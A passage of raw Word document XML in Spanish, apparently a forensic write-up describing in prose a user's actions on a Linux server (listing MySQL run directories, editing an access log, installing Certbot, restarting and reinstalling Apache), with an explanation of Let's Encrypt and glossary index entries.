          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329A20FA" w14:textId="1B9AAAC7" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hace un </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (en adelante lista) los ficheros de </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/run/mysqld</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEFE651" w14:textId="756BD352" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00307836">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ista una primera vez </w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/run</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y después con paginación por fecha de modificación, claramente busca algo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5763A6EA" w14:textId="3C2DAEC3" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Edita de nuevo </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Accesss.log.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250731A8" w14:textId="3F964C47" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Arranca </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>mysql_secure_intallation</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2008BAEC" w14:textId="03F906AE" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lista el contenido de la carpeta actual, recordemos que su ultimo posicionamiento es </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F7AEC1" w14:textId="436DC41F" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Muestra el contenido del archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/log/mysql/error.log</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00527111" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>está</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> buscando si hay pistas de lo que </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>está</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> realizando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7CC5F" w14:textId="64166CDB" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00307836">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">usca ficheros </w:t>
      </w:r>
      <w:r w:rsidR="00527111" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>php en la carpeta y subcarpetas donde está situado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26684370" w14:textId="0304938B" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Instala el paquete </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Python: Lenguaje de programación de alto nivel conocido por su facilidad de lectura y eficiencia.</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307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cerbot </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EFDAF6" w14:textId="351C2D45" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="001A130A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hay que destacar</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lo siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AFB67A" w14:textId="196099D1" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Es un complemento de </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>para Certbot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F85F7B" w14:textId="2DCA810A" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El objetivo de Certbot, Let's Encrypt y ACME (Automated El protocolo Entorno de gestión de certificados) es para hacer posible para configurar un servidor HTTPS y hacer que obtenga automáticamente un Certificado de confianza del navegador, sin ninguna intervención humana. Esto es logrado ejecutando un agente de gestión de certificados en la web</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A73C095" w14:textId="7D573414" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Este agente se utiliza para:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AFF83D" w14:textId="4B5B03CC" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Demostrar automáticamente a Let's Encrypt CA que usted controla el sitio web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD2E30C" w14:textId="7DAD74B5" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Obtenga un certificado de confianza del navegador y configúrelo en su servidor web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175D279E" w14:textId="02634E86" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lleve un registro de cuándo caducará su certificado y renuévelo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC58D38" w14:textId="36C82D71" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ayudarle a revocar el certificado si alguna vez fuera necesario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C79FB9" w14:textId="6F840D35" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reinicia el servicio de </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494731C8" w14:textId="11005A8E" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lista los procesos de </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4D9AA0" w14:textId="50B99D74" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reinstala el servidor </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
